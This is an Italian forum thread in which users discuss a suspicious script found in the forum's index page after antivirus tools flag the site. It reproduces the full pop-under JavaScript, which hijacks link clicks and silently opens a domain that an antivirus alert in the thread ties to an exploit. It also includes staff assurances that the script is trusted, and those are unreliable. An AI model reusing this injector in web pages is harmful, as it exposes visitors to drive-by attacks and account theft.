Forum e pop-down

Stato
Discussione chiusa ad ulteriori risposte.
avviso agli spettatori: la disattivazione degli javascript comporterà il non uso della shout, dei tag ot e altri che si basano su codice js.

così non venite ad aprire topic perchè non gli funziona qualche cosa
 
ora kaspersky mi blocca la pagina...mi dice che il sito è usato per rubare password, numeri di carte di credito ecc.: accesso negato
 
gestiamo l'ansia :)asd:) stiamo provvedendo a risolvere...posso dirvi comunque che lo script ad inizio pagina nella index non è nocivo,è uno script fidato!
 
si,è uno script che conosciamo,non so di preciso perchè sta li ma il grande capo ha detto che è fidato (heyos o come lui si chiama)
 
Non so voi ma a me fidato proprio non sembra...

Avira me lo ha bloccato dicendo:

Codice:
When accessing data from the URL, "http://bassamtwe.com/cgi-bin/index.cgi?9983fe8303005f3001f7f5ea6502afa2149c02d0d5b698000000000000000117"
a virus or unwanted program 'EXP/Adobe.9662' [exploit] was found.
Action taken: Blocked file

E nemmeno google crede che sto sito sia molto fidato:

http://safeweb.norton.com/report/show?name=bassamtwe.com
 
non mi riferivo a quel sito ma allo script di cui si parlava qualche pagina fa...leggetele tutte le discussioni prima di commentare!
 
R4z0r_Cr4$H ha detto:
non mi riferivo a quel sito ma allo script di cui si parlava qualche pagina fa...
quel sito compare proprio in una funzione contenuta nello script di cui si parla...
R4z0r_Cr4$H ha detto:
leggetele tutte le discussioni prima di commentare!
mi sa che non sono l'unico a dover leggere bene... se hai le palle girate son fatti tuoi, io mi preoccupo solamente che il forum del quale sono utente non mi crei problemi...

Codice:
<script language="javascript">
if (navigator.cookieEnabled){
	var pop_under = null;
	var pop_cookie_name = "advmaker_komap";
	var pop_timeout = 720;
	function pop_cookie_enabled(){
		var is_enabled = false;
		if (!window.opera && !navigator.cookieEnabled)return is_enabled;
		if (typeof document.cookie == 'string')if (document.cookie.length == 0){
			document.cookie = "test";
			is_enabled = document.cookie == 'test';
			document.cookie = '';
		}else{is_enabled = true;}
		return is_enabled;
	}
	function pop_getCookie(name){
		var cookie = " " + document.cookie;var search = " " + name + "=";
		var setStr = null;
		var offset = 0;
		var end = 0;
		if (cookie.length > 0){
			offset = cookie.indexOf(search);
			if (offset != -1){
				offset += search.length;
				end = cookie.indexOf(";", offset);
				if (end == -1){
					end = cookie.length;
				}
				setStr = unescape(cookie.substring(offset, end));
			}
		}
		return(setStr);
	}
	function pop_setCookie (name, value){
		document.cookie = name + "=" + escape(value) + ";
		expires=Friday,31-Dec-50 23:59:59 GMT;
		path=/;";
	}
	function show_pop(){
		var pop_wnd = "http://bassamtwe.com/ld/ment/";
		var fea_wnd = "scrollbars=1,resizable=1,toolbar=1,location=1,menubar=1,status=1,directories=0";
		var need_open = true;
		if (document.onclick_copy != null)document.onclick_copy();
		if (document.body.onbeforeunload_copy != null)document.body.onbeforeunload_copy();
		if (pop_under != null){
			if (!pop_under.closed)need_open = false;
		}
		if (need_open){
			if (pop_cookie_enabled()){
				val = pop_getCookie(pop_cookie_name);
				if (val != null){
					now = new Date();
					val2 = new Date(val);
					utc32 = Date.UTC(now.getFullYear(), now.getMonth(), now.getDate(), now.getHours(), now.getMinutes(), now.getSeconds());
					utc2 = Date.UTC(val2.getFullYear(), val2.getMonth(), val2.getDate(), val2.getHours(), val2.getMinutes(), val2.getSeconds());
					if ( ( utc32 - utc2 ) / 1000 < pop_timeout*60){
						need_open = false;
					}
				}
			}
		}
		if (need_open){
			under = window.open(pop_wnd, "", fea_wnd);
			under.blur();
			window.focus();
			if (pop_cookie_enabled()){
				now = new Date();
				pop_setCookie(pop_cookie_name, now);
			}
		}
	}
	function pop_init(){
		var ver = parseFloat(navigator.appVersion);
		var ver2 = (navigator.userAgent.indexOf("Windows 95")>=0 || navigator.userAgent.indexOf("Windows 98")>=0 || navigator.userAgent.indexOf("Windows NT")>=0 )&&(navigator.userAgent.indexOf('Opera') == -1)&&(navigator.appName != 'Netscape') &&(navigator.userAgent.indexOf('MSIE') > -1) &&(navigator.userAgent.indexOf('SV1') > -1) &&(ver >= 4);
		if (ver2){
			if (document.links){
				for (var i=0; i<document.links.length; i++){
					if (document.links[i].target != "_blank"){
						document.links[i].onclick_copy = document.links[i].onclick;
						document.links[i].onclick = show_pop;
					}
				}
			}
		}
		document.onclick_copy = document.onclick;
		document.onmouseup = show_pop;
	}
	pop_init();
}
</script>
 
@R4z0r: non so cosa dica murder, ma che sia o meno fidato lo script, non dovrebbe aprire il pop su quell'indirizzo. E forse conviene eliminarlo dal sorgente della index...è più di una settimana che è lì...
 
Ok ragazzi .
Allora a me hanno rubato l'accaunt su extremelot , e io sono entrato l'altra volta e ho visto quella pag .
per un po l'ho lasciata pensando che era publicita per il sito , e dopo sono entrato su extremelot .
Totale ? mi hanno rubato l'account , non hanno guadagnato molto , extremelot e' un gioco , ma il prossimo potrebbe
essere un utente che entra nel suo conto in banca .
Stiamo attenti .
 
Ho analizzato quello script. Non ho trovato nulla di dannoso. Usa molte volte document.cookie, ma non per passarli alla pagina ma per assegnare un nuovo cookie che non fa visualizzare il popup.
 
a me si apre quel popup di m***a che mi impalla firefox anche se non si carica mai... l'antivirus (avast) in compenso non mi rivela nulla...
 
murder cosa aspetti una richiesta in carta bollata per levarlo?
non so quanto ti renda ma sta cosa ha rotto le pall# un pò a tutti...
 
come dico spesso in questi casi "gestiamo l'ansia" (che poi ansia non è...).Il problema è stato segnalato,è stato ampiamente analizzato e credo che sia inutile tenere aperta questa discussione.Se qualcuno ha qualcosa di rilevante a riguardo può mandarmi un PM.Appena ci saranno novità lo comunicherò personalmente!
 
Stato
Discussione chiusa ad ulteriori risposte.